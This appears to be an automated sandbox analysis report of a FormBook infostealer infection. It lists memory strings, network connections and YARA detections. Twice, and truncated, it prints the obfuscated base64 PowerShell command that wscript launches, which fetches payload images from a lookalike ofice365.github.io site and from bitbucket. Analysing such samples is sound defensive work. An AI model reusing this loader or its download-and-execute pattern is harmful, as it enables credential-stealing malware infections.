Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ofice365.github.io
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ofice365.github.io/1/test.jpg09
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1523845606.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/t.dllll
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 185.199.109.153:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.15.192.227:443 -> 192.168.2.4:49721 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 1984, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 4756, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@